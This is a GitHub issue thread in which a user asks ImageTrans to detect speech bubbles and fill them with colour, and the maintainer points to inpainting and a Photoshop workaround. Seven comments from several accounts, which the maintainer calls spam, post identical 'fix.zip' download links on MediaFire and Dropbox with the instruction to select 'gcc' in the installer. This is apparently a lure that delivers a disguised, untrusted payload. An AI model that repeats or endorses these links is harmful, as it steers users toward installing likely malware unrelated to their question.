### ISSUE TITLE
Adding the ability to detect bubbles and color them

### ISSUE THREAD

**Issue by NANAREDFISH** [xulihang/ImageTrans-docs#742]
is it possible to add a clean function based on the bubble and color it with the appropriate color instead of using a text mask?
https://drive.google.com/file/d/1wun_d53Bp-aVneKkzpFuT_kJ4sH77vRe/view?usp=drive_link

**Comment by NANAREDFISH** [comment]
Also, in the video sent, a Photoshop action has been used that, in addition to colorization, utilizes some other Photoshop features, which result in the removal of text and prevent the pixelation around the bubble. I will also send you these actions so that you can test them in Photoshop.
https://drive.google.com/file/d/1A1CQ4NVlngdboGrzTG9r9dD8lWCTtZ8-/view?usp=sharing

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by xulihang** [comment]
Which mode do you prefer? To fill in the bubbles with a background color or restore the background?

Fill in with the background color.

![image](https://github.com/user-attachments/assets/179e3efb-81dd-4bb7-8531-2d5f2355f4c0)

Restore the background:

![image](https://github.com/user-attachments/assets/ce558a6f-f34d-4b0d-8298-91640be83d34)

The latter one is called inpainting which ImageTrans supports. The first one is a bit difficult as I have to do bubble segmentation. 

Check out this blog to know more about inpainting: https://www.basiccat.org/details-about-image-text-removal-using-imagetrans/

**Comment by xulihang** [comment]
@NANAREDFISH  It is not normal that there are so many spam comments. You can unsubscribe this issue to avoid being notified.

**Comment by NANAREDFISH** [comment]
I did it.
Also, I think it would be great if we could have both features together, and also have the ability to color the bubble with the background color.

**Comment by NANAREDFISH** [comment]
Of course, the results achieved by working on the inpainting feature are excellent, but it would be great if all the bubbles could easily turn white without worrying about which method's results might work better.

**Comment by xulihang** [comment]
I decided not to add this feature for now. You can use Photoshop to create the image with the balloon filled and then add "-original.jpg" to the files to use them in ImageTrans.


Example:

```
image.jpg
image.jpg-original.jpg
```
